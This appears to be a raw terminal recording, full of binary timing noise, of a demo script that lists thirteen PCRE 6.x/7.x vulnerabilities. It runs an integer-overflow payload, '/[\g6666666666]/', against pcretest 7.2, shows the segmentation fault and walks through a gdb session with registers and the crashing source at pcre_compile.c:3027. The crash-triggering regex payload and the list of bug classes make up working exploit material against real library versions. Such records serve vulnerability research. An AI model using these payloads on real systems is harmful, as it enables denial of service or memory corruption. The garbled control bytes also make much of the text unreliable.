>G: user@vapor|0; >Gp>Gw>G}d>G >G /demos/pcre >GH: user@vapor|0; >G[ s>G o>Gu>G4r>Gyqc>Ge>G >Gp .>G .>G` />G3d>Ge>GWm>Gos.sh >G >GDp : demo@vapor|0; >Gjh>GEa>Gn>G dle_product >Gf2 >Gb7kbash: config.sh: line 37: syntax error near unexpected token `(' bash: config.sh: line 37: `function ()' >G8L00. lone \E with trigger char (6.x+) >G8C01. matched \E deref (6.x+) >G9I02. grouped string with \E (6.x+) >G49H03. \E in character class (7.x+) >Gf9J04. not a single char class (7.x+) >G9C05. ditto, variation (7.x+) >G9J06. optimised cond in group (6.x+) >G9<07. variation (6.x+) >G):D08. backtrack too far (6.x+) >GY:B09. another variant (6.x+) >G:J10. seeking past end for \c (7.x+) >G:B11. integer overflow (7.x) >G:B12. integer overflow (7.x) >G ;select vulnerability: >GO1>G2>G >G"integer overflow (7.x) selected. >G >G#payload: /[\g6666666666]/\ndata\n >G press enter to run. >G >G [1] 29526 >G]PCRE version 7.2 2007-06-19 >GȚ re> >G@../demos.sh: line 80: 29528 Segmentation fault (core dumped) /usr/local/encap/pcre-7.2/bin/pcretest <<(echo -e "$payload") >G-[1]+ Exit 139 ( eval $cmd ) >Gd'Core file generated. Opening gdb ... >GN$IUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". >G%@ warning: Can't read pathname for load map: Input/output error.>G& >GJ)GReading symbols from /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0...>G*done. >G+DLoaded symbols for /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0 >G+BReading symbols from /usr/local/encap/pcre-7.2/lib/libpcre.so.0...>G3done. >Gb4?Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcre.so.0 >Gu54Reading symbols from /lib/tls/i686/cmov/libc.so.6...>GJFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...>GTdone. >GTdone. >GT1Loaded symbols for /lib/tls/i686/cmov/libc.so.6 >GU*Reading symbols from /lib/ld-linux.so.2...>GMX6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...>G[done. >Gm[done. >G['Loaded symbols for /lib/ld-linux.so.2 >G]yCore was generated by `/usr/local/encap/pcre-7.2/bin/pcretest'. Program terminated with signal 11, Segmentation fault. >Gj#0 0xf7fdb517 in compile_branch (optionsptr=0xffffa670, codeptr=0xffffa634, ptrptr=0xffffa638, errorcodeptr=0xffffb724, firstbyteptr=0xffffa630, reqbyteptr=0xffffa62c, >GjS bcptr=0xffffa620, cd=0xffffb6c8, lengthptr=0xffffa628) at pcre_compile.c:3027 >Gm.3027 classbits[c/8] |= (1 << (c&7)); >Gun>>>G 5p>G- >Gc>G=  >G $1 = 0x72a2bd3b>G  >G7 >>>GS7p>G]f >G9c>G#tl>Ga>GoYs>G4s>Gc} >Gb>G"i>Gy t>G~ s>GCS >GS$2 = '\0' >GT >G1T>>>G p>G5 >Gc>G` l>G a>Gs>GcLs>GNb>Gi>Gt>GY s>G1[>G c>G/C />G# 8>G ]>G| >G})Cannot access memory at address 0xe53fc13>G(} >GG}>>>G-]i>Gn>Gf>Go>Gƹ  >G r>Gji e>Gg>G >Geax 0xe5457a7>G% 0xe5457a7 ecx 0xf7ff7a80>G& 0xf7ff7a80 edx 0xffffa490>G& 0xffffa490 ebx 0xf7ff7a80>G& 0xf7ff7a80 esp 0xffffa340>G& 0xffffa340 ebp 0xffffa5d8>G% 0xffffa5d8 esi 0xe5457a7>G2 0xe5457a7 edi 0xffffa48c 0xffffa48c >Geip 0xf7fdb517>G*# 0xf7fdb517 >G9eflags 0x10202>GG [ IF RF ] cs 0x23>GW 0x23 ss 0x2b>Gg 0x2b ds 0x2b>Gw 0x2b es 0x2b>G 0x2b fs 0x0>G 0x0 gs 0x63>G 0x63 >G>>>Gl>G >Gh3022 else >G{(3023 #endif /* SUPPORT_UTF8 */ 3024 >GA3025 /* Handle a single-byte character */ 3026 { >G.3027 classbits[c/8] |= (1 << (c&7)); >GD3028 if ((options & PCRE_CASELESS) != 0) 3029 { >G23030 c = cd->fcc[c]; /* flip case */ >G03031 classbits[c/8] |= (1 << (c&7)); >G>>>G$ >G%3032 } >G(%!3033 class_charcount++; >G6%23034 class_lastchar = c; 3035 } >GC%3036 } 3037 >GP%S3038 /* Loop until ']' reached. This "while" is the end of the "do" above. */ >G^%3039 >Gk%F3040 while ((c = *(++ptr)) != 0 && (c != ']' || inescq)); 3041 >G%>>>Gvquit >G: demo@vapor|0; >Gexit